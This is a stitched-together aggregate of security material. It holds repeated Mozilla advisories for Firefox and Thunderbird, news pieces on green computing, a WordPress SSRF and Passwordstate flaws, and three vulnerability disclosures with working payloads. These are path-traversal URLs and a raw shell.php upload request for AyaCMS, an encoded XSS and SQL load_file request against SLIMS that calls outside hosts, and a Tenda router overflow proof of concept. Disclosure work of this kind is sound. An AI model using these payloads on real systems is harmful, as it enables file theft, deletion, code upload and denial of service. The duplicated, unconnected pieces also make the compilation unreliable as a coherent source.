When opening a Windows shortcut from the local filesystem, an attacker could supply a remote path that would lead to unexpected network requests from the operating system.<br>This bug only affects Firefox for Windows. Other operating systems are unaffected.*. This vulnerability affects Firefox ESR < 102.1, Firefox < 103, and Thunderbird < 102.1.

**Mozilla Foundation Security Advisory 2022-30**

Announced

July 26, 2022

Impact

moderate

Products

Firefox ESR

Fixed in

*   Firefox ESR 102.1

**#CVE-2022-36319: Mouse Position spoofing with CSS transforms**

Reporter

Irvan Kurniawan

Impact

moderate

**Description**

When combining CSS properties for overflow and transform, the mouse cursor could interact with different coordinates than displayed.

**References**

*   Bug 1737722

**#CVE-2022-36318: Directory indexes for bundled resources reflected URL parameters**

Reporter

Gijs Kruitbosch

Impact

moderate

**Description**

When visiting directory listings for chrome:// URLs as source text, some parameters were reflected.

**References**

*   Bug 1771774

**#CVE-2022-36314: Opening local <code>.lnk</code> files could cause unexpected network loads**

Reporter

akucybersec

Impact

moderate

**Description**

When opening a Windows shortcut from the local filesystem, an attacker could supply a remote path that would lead to unexpected network requests from the operating system.  
This bug only affects Firefox for Windows. Other operating systems are unaffected.\*

**References**

*   Bug 1773894

**#CVE-2022-2505: Memory safety bugs fixed in Firefox 103 and 102.1**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 102. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 103 and 102.1

CVE-2022-36314: Security Vulnerabilities fixed in Firefox ESR 102.1

When using the Performance API, an attacker was able to notice subtle differences between PerformanceEntries and thus learn whether the target URL had been subject to a redirect. This vulnerability affects Firefox < 103.

**Mozilla Foundation Security Advisory 2022-28**

Announced

July 26, 2022

Impact

moderate

Products

Firefox

Fixed in

*   Firefox 103

**#CVE-2022-36319: Mouse Position spoofing with CSS transforms**

Reporter

Irvan Kurniawan

Impact

moderate

**Description**

When combining CSS properties for overflow and transform, the mouse cursor could interact with different coordinates than displayed.

**References**

*   Bug 1737722

**#CVE-2022-36317: Long URL would hang Firefox for Android**

Reporter

Irwan

Impact

moderate

**Description**

When visiting a website with an overly long URL, the user interface would start to hang. Due to session restore, this could lead to a permanent Denial of Service.  
_This bug only affects Firefox for Android. Other operating systems are unaffected._

**References**

*   Bug 1759951

**#CVE-2022-36318: Directory indexes for bundled resources reflected URL parameters**

Reporter

Gijs Kruitbosch

Impact

moderate

**Description**

When visiting directory listings for chrome:// URLs as source text, some parameters were reflected.

**References**

*   Bug 1771774

**#CVE-2022-36314: Opening local <code>.lnk</code> files could cause unexpected network loads**

Reporter

akucybersec

Impact

moderate

**Description**

When opening a Windows shortcut from the local filesystem, an attacker could supply a remote path that would lead to unexpected network requests from the operating system.  
This bug only affects Firefox for Windows. Other operating systems are unaffected.\*

**References**

*   Bug 1773894

**#CVE-2022-36315: Preload Cache Bypasses Subresource Integrity**

Reporter

Hiroshige Hayashizaki

Impact

low

**Description**

When loading a script with Subresource Integrity, attackers with an injection capability could trigger the reuse of previously cached entries with incorrect, different integrity metadata.

**References**

*   Bug 1762520

**#CVE-2022-36316: Performance API leaked whether a cross-site resource is redirecting**

Reporter

Jannis Rautenstrauch

Impact

low

**Description**

When using the Performance API, an attacker was able to notice subtle differences between PerformanceEntries and thus learn whether the target URL had been subject to a redirect.

**References**

*   Bug 1768583

**#CVE-2022-36320: Memory safety bugs fixed in Firefox 103**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 102. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 103

**#CVE-2022-2505: Memory safety bugs fixed in Firefox 103 and 102.1**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 102. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 103 and 102.1

CVE-2022-36316: Security Vulnerabilities fixed in Firefox 103

When visiting directory listings for `chrome://` URLs as source text, some parameters were reflected. This vulnerability affects Firefox ESR < 102.1, Firefox ESR < 91.12, Firefox < 103, Thunderbird < 102.1, and Thunderbird < 91.12.

**Mozilla Foundation Security Advisory 2022-31**

Announced

July 28, 2022

Impact

moderate

Products

Thunderbird

Fixed in

*   Thunderbird 91.12

_In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts._

**#CVE-2022-36319: Mouse Position spoofing with CSS transforms**

Reporter

Irvan Kurniawan

Impact

moderate

**Description**

When combining CSS properties for overflow and transform, the mouse cursor could interact with different coordinates than displayed.

**References**

*   Bug 1737722

**#CVE-2022-36318: Directory indexes for bundled resources reflected URL parameters**

Reporter

Gijs Kruitbosch

Impact

moderate

**Description**

When visiting directory listings for chrome:// URLs as source text, some parameters were reflected.

**References**

*   Bug 1771774

CVE-2022-36318: Security Vulnerabilities fixed in Thunderbird 91.12

AyaCMS 3.1.2 is vulnerable to file deletion via /aya/module/admin/fst_del.inc.php

Vulnerability files: /aya/module/admin/fst\_down.inc.php, /aya/module/admin/fst\_del.inc.php  
Vulnerability description: The check\_path function has flaws in the filtering of parameters passed in by $file. We only need to enter characters other than "./\\" such as aya in the header of the parameter to bypass the detection and download or delete any file in the system.  
1、Arbitrary file download Vulnerability  
  
You can access any file in the system through  
admin.php?action=fst_down&file=aya/table/../../../../../../windows/win.ini  

2、Arbitrary file delete Vulnerability  
  
First I create a file named 111.txt under C:\\Windows  
  
Then the files can be deleted through  
admin.php?action=fst_del&file=aya/../../../../../windows/111.txt&in_ajax=1  
  

3、Arbitrary file upload Vulnerability  

    POST /upload/admin.php?action=fst_upload&file=aya HTTP/1.1
    Host: xx.xx.xx.xx
    Content-Length: 204
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9HCWsLRL4AuZwHyu
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    ------WebKitFormBoundary9HCWsLRL4AuZwHyu
    Content-Disposition: form-data; name="upfile"; filename="shell.php"
    Content-Type: text/plain
    
    <?php phpinfo(); ?>
    ------WebKitFormBoundary9HCWsLRL4AuZwHyu--

CVE-2022-47926: AyaCMS v3.1.2 has  Arbitrary file operations Vulnerability · Issue #7 · loadream/AyaCMS

Less is often more when it comes to both infosec and eco-friendly computing practices

Adam Bannister 22 December 2022 at 15:35 UTC  
Updated: 22 December 2022 at 15:42 UTC

Less is often more when it comes to both infosec and eco-friendly computing practices

Reducing the carbon footprint of computing architecture could play a role not just in tackling climate change but another growing, borderless threat too – cyber-attacks.

That’s according to co-authors of a white paper that highlights how best practices for making cloud infrastructure secure and sustainable sometimes happily overlap with the common pursuit of efficiencies.

“The lowest hanging fruit for sustainability is to do less and save less data, which should also reduce attack surfaces,” Anne Currie, co-author of draft paper ‘The State of Green Cloud Software Practices’ and community chair at Green Software Foundation, told The Daily Swig.

Read more of the latest news about secure development

Fellow co-author Paul Johnston, founder of UK tech consultancy Roundabout Labs and former senior developer advocate for serverless at Amazon Web Services (AWS), echoes these sentiments.

“My take is that generally, greener means fewer lines of code and that means smaller attack surface,” he told The Daily Swig. Johnston said this also means “better use of managed services which, again, generally means that your attack surface is reduced (services tend to be better for infosec)”.

Shutting down defunct applications and services has the same effect. “Unmaintained, zombie, workloads are bad for the environment as well as being a security risk,” reads the white paper, which also has contributors from Red Hat, Microsoft, and the Green Web Foundation.

**Memory-safe languages**

Developers are urged to “rewrite code to use a more lightweight framework or language. Moving from Python to Rust could result in a 10-fold cut in CPU requirements, for example,” says the white paper. This could have security benefits insofar as Rust is, unlike Python, memory safe by default.

The white paper also endorses Golang as “an efficient language and easier than the classic HPC options of C or C++”.

Again, there is some positive correlation here with security best practices given the US National Security Agency (NSA) recently urged (PDF) organizations to abandon languages lacking “inherent memory protection, such as C/C++”, in favor of memory-safe alternatives like Golang, C#, Java, Ruby, and Swift.

Indeed, C and C++ have been blamed for the fact 70% of Microsoft and Google Chrome flaws are memory safety vulnerabilities.

Rust is seen as considerably more energy-efficient than Python

**Security and C, C++**

However, it’s perhaps reductive to conclude that ‘lightweight’ languages – generally defined in terms of syntax, memory footprint, and implementation complexity – are inherently more secure or sustainable in every context.

After all, it’s perfectly possible to write a super-efficient, ‘green’ program in C++, but this is obviously contingent on the developer’s aptitude.

“Vulnerabilities are less likely if the language constructs make it so the easy or obvious way either can’t or is unlikely to be a vulnerability,” David A Wheeler, director of open source supply chain security at the Linux Foundation, told The Daily Swig.

DON’T MISS ‘We don’t teach developers how to write secure software’: David A Wheeler on reversing CVE surge

“C is a relatively simple programming language in the sense that it has relatively few constructs; in that view, it’s lightweight. However, many operations in C (array deference, pointer assignment, or dereference, etc) provide no automatic protections, so any mistake can quickly lead to a vulnerability.

“In contrast, C++ is a much larger and more complex language than C,” continued Wheeler. “In at least some measures it wouldn’t be considered lightweight. However, its lack of many safety mechanisms by default leads to the same problems.”

**Managed cloud services**

Managed cloud services are also endorsed by the sustainable computing white paper because, among other things, they offer high compute density and autoscaling via serverless services.

Yet some enterprises are still nervous about moving data security into shared environments. Ann Currie, a software engineer as well as sci-fi author, considers these fears completely unjustified.

“The cloud puts way more effort into infosec than companies,” says Currie. “It’s a classic area where specialists kick the butt of the (usually) generalists in enterprises.”

Nevertheless, Paul Johnston warns that delegating security functions does create risks.

Catch up with the latest articles about security best practices

“The benefits of a ‘greener’ approach (even if unintentional) are very positive from an infosec view,” he explains.

“However, there is a possible downside in that the security side that you resolve by using managed services or by reducing code can then lead to an element of complacency about the elements that are often a little more complicated.”

The white paper also recommends “moving more work to the client or edge”, which generates security challenges, albeit solvable ones, by extending the attack surface beyond the data center.

Another sustainability goal is surely an unequivocal plus for security. Currie, Johnston, and their fellow co-authors envisage a future where firmware remains backwards-compatible with devices that are at least 10 years old – keeping users protected by security patches for longer.

**Eco incentives**

Compliance and shareholder pressures plus lower running costs surely persuaded tech giants like Microsoft to set ambitious targets for becoming fully carbon neutral or even carbon negative.

Nevertheless, Currie suspects the potentially dire reputational and financial costs of neglecting cybersecurity are an even stronger incentive for change.

“Getting sustainability to the top of the priority list is harder than getting security there,” she says. “The good news is cloud managed services are usually fairly sustainable and secure.”

In other words: anyone trying to persuade organizations to make their computing practices greener would be wise to flag any incidental security benefits when doing so.

RECOMMENDED Deserialized WebSec roundup – Fortinet, Citrix bugs; another Uber breach; hacking NFTs

Lean, green coding machine: How sustainable computing drive can reduce attack surfaces

A successful attacker could use the SSRF vulnerability to collect metadata from WordPress sites hosted on an AWS server, and potentially log in to a cloud instance to run commands.

A vulnerability in the Google Web Stories plug-in for WordPress could be exploited via a server-side request forgery (SSRF) vulnerability to steal Amazon Web Services (AWS) metadata from sites hosted on the AWS server. That metadata can include sensitive information such as the AccessKeyId, SecretAccessKey, and Token.

An SSRF vulnerability gives attackers a way to elevate privileges on a compromised system using a modified URL, thereby gaining access to internal resources.

The Web Stories plug-in is an open visual storytelling format for the Web, consisting of animations and other interactive graphics, which can be shared and embedded across sites and apps. There are more than 100,000 active installations of the plug-in.

A Wordfence research team discovered the plug-in was vulnerable to the SSRF bug (CVE-2022-3708) in versions through 1.24.0, due to insufficient validation of URLs supplied via the "url" parameter found via the /v1/hotlink/proxy REST API Endpoint.

"Exploiting this vulnerability, an authenticated user could make web requests to arbitrary locations originating from the web application," Wordfence Threat Intelligence team member Topher Tebow wrote in a Dec. 21 blog post.

He added that, in testing, the team was able to uncover specific metadata used to enable features like EC2 Instance Connect; stolen metadata could then be used to log in to the virtual server and run commands through the terminal.

The researcher noted that this is the tip of the iceberg: "There are many metadata categories provided by AWS that each have specific uses and varying degrees of severity if misused."

The team found the flaw in October, and by the end of November, two blocks of code were updated to fully patch the vulnerability in the plug-in.

"With the patch applied within version 1.25.0 and newer, attempts to obtain AWS metadata will fail," Tebow explained.

He added that the attack can succeed for users logged in with an account that has minimal permissions, such as a subscriber, so the issue particularly threatens sites with open registration.

"The authenticated user does not need high level privileges to exploit this vulnerability," Tebow continued.

**Using Zero Trust to Limit SSRF Vulnerabilities**

"Understanding the impact of vulnerabilities such as SSRF vulnerabilities is critical for developers," Tebow wrote. "Keeping code secure can be difficult to ensure during the development phase, which is why the code must be tested for vulnerabilities during and after it has been written."

Developers were advised to pay close to attention to their coding practices as they relate to the vulnerabilities inherent in each programming language, ensure any inputs are validated, and to adopt a posture of zero trust authentication.

"SSRF vulnerabilities are possible because the internal and external resources may be configured to assume that requests sent from an internal location are inherently trustworthy," Tebow noted. "By requiring validation and authorization for every action, this default trust is removed, and requests must be validated properly before being considered trusted."

Constant code reviews and updates of WordPress plug-ins and themes are among the other steps that developers can take to limit exploits of WordPress-built websites.

**WordPress Sites Face a Raft of Security Issues**

Malicious actors have been targeting WordPress sites at a rapid clip — mainly through vulnerable plug-ins — since the beginning of the year: In February, a report found tens of thousands of websites powered by WordPress were vulnerable to attack via a remote code execution (RCE) bug in a widely used plug-in called Essential Addons for Elementor.

In May, there was a widespread attack launched to exploit known RCE flaw in the Tatsu Builder WordPress plug-in, and two months later, researchers discovered a phishing kit that injects malware into legitimate WordPress sites and uses a fake PayPal-branded social engineering scam.

More recently, a threat group called SolarMarker exploited a vulnerable WordPress-run website to encourage victims to download fake Chrome browser updates, while another group of attackers were actively exploiting a critical vulnerability in BackupBuddy, a WordPress plug-in that an estimated 140,000 websites are using to back up their installations.

Google WordPress Plug-in Bug Allows AWS Metadata Theft

Multiple high-severity vulnerabilities have been disclosed in Passwordstate password management solution that could be exploited by an unauthenticated remote adversary to obtain a user's plaintext passwords.
"Successful exploitation allows an unauthenticated attacker to exfiltrate passwords from an instance, overwrite all stored passwords within the database, or elevate their privileges within

Password Management / Online Security

Multiple high-severity vulnerabilities have been disclosed in **Passwordstate** password management solution that could be exploited by an unauthenticated remote adversary to obtain a user's plaintext passwords.

"Successful exploitation allows an unauthenticated attacker to exfiltrate passwords from an instance, overwrite all stored passwords within the database, or elevate their privileges within the application," Swiss cybersecurity firm modzero AG said in a report published this week.

"Some of the individual vulnerabilities can be chained to gain a shell on the Passwordstate host system and dump all stored passwords in cleartext, starting with nothing more than a valid username."

Passwordstate, developed by an Australian company named Click Studios, has over 29,000 customers and is used by more than 370,000 IT professionals.

One of the flaws also impacts Passwordstate version 9.5.8.4 for the Chrome web browser. The latest version of the browser add-on is 9.6.1.2, which was released on September 7, 2022.

The list of vulnerabilities identified by modzero AG is below -

*   CVE-2022-3875 (CVSS score: 9.1) - An authentication bypass for Passwordstate's API
*   CVE-2022-3876 (CVSS score: 6.5) - A bypass of access controls through user-controlled keys
*   CVE-2022-3877 (CVSS score: 5.7) - A stored cross-site scripting (XSS) vulnerability in the URL field of every password entry
*   No CVE (CVSS score: 6.0) - An insufficient mechanism for securing passwords by using server-side symmetric encryption
*   No CVE (CVSS score: 5.3) - Use of hard-coded credentials to list audited events such as password requests and user account changes through the API
*   No CVE (CVSS score: 4.3) - Use of insufficiently protected credentials for Password Lists

Exploiting the vulnerabilities could permit an attacker with knowledge of a valid username to extract saved passwords in cleartext, overwrite the passwords in the database, and even elevate privileges to achieve remote code execution.

What's more, an improper authorization flow (CVSS score: 3.7) identified in the Chrome browser extension could be weaponized to send all passwords to an actor-controlled domain.

In an attack chain demonstrated by modzero AG, a threat actor could forge an API token for an administrator account and exploit the XSS flaw to add a malicious password entry to obtain a reverse shell and grab the passwords hosted in the instance.

Users are recommended to update to Passwordstate 9.6 - Build 9653 released on November 7, 2022, or later versions to mitigate the potential threats.

Passwordstate, in April 2021, fell victim to a supply chain attack that allowed the attackers to leverage the service's update mechanism to drop a backdoor on customer's machines.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Security Flaw Reported in Passwordstate Enterprise Password Manager

Senayan Library Management System version 9.2.2 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.2.2 a.k.a SLIMS 9 XSS-Reflected - inserting gif - redirect to outside HTTPS server## Author: nu11secur1ty## Date: 12.21.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.2## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload t8xqv<script>alert(1)</script>uou2q was submitted in themanual insertion `point 3`.This input was echoed unmodified in the application's response.The attacker can trick the already authenticated users to visit a verydangerous web page or malicious javascript exploit.## STATUS: HIGH Vulnerability[+] Payloads:```GETGET /slims9_bulian-9.2.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27%27%2b(select%20load_file(%27%5c%5c%5c%5cazditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id%5c%5cdzd%27))%2b%27HTTP/1.1Host: pwnedhost.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=ijs22qmki227r86feh6bppc56o; admin_logged_in=1Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2)## Proof and Exploit:[href](https://streamable.com/mnpw30)## Time spent`00:05:00`

Senayan Library Management System 9.2.2 Cross Site Scripting

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the urls parameter at /goform/saveParentControlInfo.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/saveParentControlInfo request.

This vulnerability lies in the /goform/saveParentControlInfo page，The details are shown below:

    int __fastcall saveParentControlInfo(int a1)
    {
      int v2; // $v0
      int v3; // $v0
      void *dest; // [sp+30h] [+30h] BYREF
      void *ptr; // [sp+34h] [+34h]
      int v6; // [sp+38h] [+38h]
      int v7; // [sp+3Ch] [+3Ch]
      int i; // [sp+40h] [+40h]
      int v9; // [sp+44h] [+44h]
      int v10; // [sp+48h] [+48h]
      char *nptr; // [sp+4Ch] [+4Ch]
      char *v12; // [sp+50h] [+50h]
      char *v13; // [sp+54h] [+54h]
      char *urls_value; // [sp+58h] [+58h]
      char *v15; // [sp+5Ch] [+5Ch]
      char *time_value; // [sp+60h] [+60h]
      char *v17; // [sp+68h] [+68h]
      char *deviceId_value; // [sp+6Ch] [+6Ch]
      char v19[64]; // [sp+70h] [+70h] BYREF
      char v20[512]; // [sp+B0h] [+B0h] BYREF
      int v21; // [sp+2B0h] [+2B0h] BYREF
      __int16 v22; // [sp+2B4h] [+2B4h] BYREF
      unsigned __int8 v23; // [sp+2B6h] [+2B6h] BYREF
      char v24[120]; // [sp+2B8h] [+2B8h] BYREF
      char v25[128]; // [sp+330h] [+330h] BYREF
      int v26; // [sp+3B0h] [+3B0h] BYREF
      int v27[5]; // [sp+3B4h] [+3B4h] BYREF
      int v28[8]; // [sp+3C8h] [+3C8h] BYREF
      int v29[8]; // [sp+3E8h] [+3E8h] BYREF
    
      memset(v19, 0, sizeof(v19));
      memset(v20, 0, sizeof(v20));
      v21 = 0;
      v22 = 0;
      v23 = 0;
      deviceId_value = (char *)websGetVar(a1, "deviceId", &unk_4CE8D8);
      v17 = (char *)websGetVar(a1, "enable", &unk_4CE8D8);
      time_value = (char *)websGetVar(a1, "time", &unk_4CE8D8);
      v15 = (char *)websGetVar(a1, "url_enable", &unk_4CE8D8);
      urls_value = (char *)websGetVar(a1, "urls", &unk_4CE8D8);
      v13 = (char *)websGetVar(a1, "day", &unk_4CE8D8);
      v12 = (char *)websGetVar(a1, "block", &unk_4CE8D8);
      nptr = (char *)websGetVar(a1, "connectType", &unk_4CE8D8);
      if ( atoi(nptr) == 1 && atoi(v12) == 1 )
        wl_l2_filter_add(deviceId_value);
      if ( *time_value )
      {
        v28[0] = 0;
        v28[1] = 0;
        v28[2] = 0;
        v28[3] = 0;
        v28[4] = 0;
        v28[5] = 0;
        v28[6] = 0;
        v28[7] = 0;
        v29[0] = 0;
        v29[1] = 0;
        v29[2] = 0;
        v29[3] = 0;
        v29[4] = 0;
        v29[5] = 0;
        v29[6] = 0;
        v29[7] = 0;
        sscanf(time_value, "%[^-]-%s", v28, v29);
        if ( !strcmp((const char *)v28, (const char *)v29) )
        {
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 1);
          return websDone(a1, 200);
        }
      }
      v10 = 0;
      v9 = 0;
      i = 0;
      memset(v24, 0, sizeof(v24));
      memset(v25, 0, sizeof(v25));
      v7 = 0;
      v26 = 0;
      v6 = 0;
      ptr = malloc(0x254u);
      memset(ptr, 0, 0x254u);
      strcpy((char *)ptr + 2, deviceId_value);
      dest = malloc(0x254u);
      memset(dest, 0, 0x254u);
      *(_WORD *)dest = atoi(v17) != 0;
      strcpy((char *)dest + 2, deviceId_value);
      strcpy((char *)dest + 34, time_value);
      sscanf(
        v13,
        "%d,%d,%d,%d,%d,%d,%d",
        &v21,
        (char *)&v21 + 1,
        (char *)&v21 + 2,
        (char *)&v21 + 3,
        &v22,
        (char *)&v22 + 1,
        &v23);
      if ( !(_BYTE)v21
        && __PAIR16__(BYTE1(v21), 0) == BYTE2(v21)
        && __PAIR16__(HIBYTE(v21), 0) == (unsigned __int8)v22
        && __PAIR16__(HIBYTE(v22), 0) == v23
        && !*v12 )
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = 1;
      }
      else
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = *((_BYTE *)&v21 + i) != 0;
      }
      v2 = atoi(time_value);
      *((_DWORD *)dest + 19) = v2;
      strcpy((char *)dest + 80, urls_value);
      v3 = atoi(v15);
      *((_BYTE *)dest + 592) = v3 != 0;
      v10 = getparentcontrolinfo(0, &v26, ptr);
      if ( v10 <= 0 )
      {
        if ( !atoi(v17) && atoi(v12) != 1 )
        {
    LABEL_28:
          free(ptr);
          free(dest);
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 0);
          return websDone(a1, 200);
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
            for ( i = 0; i < 7; ++i )
              *((_BYTE *)dest + i + 66) = 1;
            strcpy((char *)dest + 34, "00:00-24:00");
          }
        }
        v9 = bm_get_id_list("parent.control.id", v24, 30);
        if ( v9 )
        {
          if ( v9 >= 30 )
          {
            free(ptr);
            free(dest);
            websWrite(
              a1,
              "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
            websWrite(a1, "{\"errCode\":%d}", 1);
            return websDone(a1, 200);
          }
          for ( i = 0; i != 30; ++i )
          {
            if ( !*(&dest + i + 162) )
            {
              v26 = i + 1;
              break;
            }
          }
          GetValue("parent.control.id", v20);
          sprintf(v25, "%s,%d", v20, v26);
          SetValue("parent.control.id", v25);
          setparentcontrolinfo(v10, v26, dest);
        }
        else
        {
          SetValue("parent.control.id", "1");
          v26 = 1;
          setparentcontrolinfo(v10, 1, dest);
        }
      }
      else
      {
        if ( atoi(v17) )
        {
          *((_DWORD *)dest + 19) = *((_DWORD *)ptr + 19);
        }
        else
        {
          memcpy(dest, ptr, 0x254u);
          *(_BYTE *)dest = 0;
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          memcpy(dest, ptr, 0x254u);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
          }
          else
          {
            *((_BYTE *)dest + 1) = 0;
          }
        }
        if ( !memcmp(ptr, dest, 0x254u) )
          goto LABEL_28;
        setparentcontrolinfo(v10, v26, dest);
      }
      free(ptr);
      free(dest);
      v27[0] = 0;
      v27[1] = 0;
      v27[2] = 0;
      v27[3] = 0;
      v27[4] = 0;
      sprintf((char *)v27, "op=%d", 5);
      send_msg_to_netctrl(14, v27);
      send_msg_to_netctrl(41, v27);
      CommitCfm();
      websWrite(
        a1,
        "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
      websWrite(a1, "{\"errCode\":%d}", 0);
      return websDone(a1, 200);
    }
    

This POC can result in a Dos.

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 4106
    
    urls=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa